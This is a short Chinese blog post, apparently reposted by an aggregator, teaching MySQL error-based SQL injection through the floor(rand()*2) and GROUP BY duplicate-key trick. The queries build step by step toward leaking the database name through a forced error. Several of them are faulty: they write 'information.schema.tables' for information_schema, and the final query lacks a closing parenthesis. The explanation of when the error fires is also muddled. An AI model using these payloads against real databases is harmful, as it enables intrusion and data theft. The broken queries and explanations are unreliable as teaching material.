报错注入
Posted 呀小王呀
tags:
篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了报错注入相关的知识,希望对你有一定的参考价值。
报错注入
1,rand()函数可以产生0~1随机数。
rand()函数产生的随机数是0~1,floor函数向下取整,取到的值是固定的“0”,
rand()*2,floor函数取到的值是不固定的“0”或"1"
floor(x)函数向下取整,即取不超过x的最大整数。
rand(0)*2将取0~2中的随机数
floor(rand()*2)记录显示两条就报错
floor(rand(0)*2)记录显示三条一上,且三条以上必报错。
group by对数据进行分组。
详细步骤:
我们先查询数据库
select database();
select concat(database(),floor(rand()*2));
查询名字太长,取个别名为name
select concat(database(),floor(rand()*2))name;
我们查询information.schema.tables表中有多少表格,多少列
select concat(database(),floor(rand()*2))name from information.schema.tables;
我们用group by分组
select concat(database(),floor(rand()*2))name from information.schema.tables group by name;
我们用count()函数进行统计
select count(*) , concat(database(),floor(rand()*2)name from information_schema.tables group by name;
以上是关于报错注入的主要内容,如果未能解决你的问题,请参考以下文章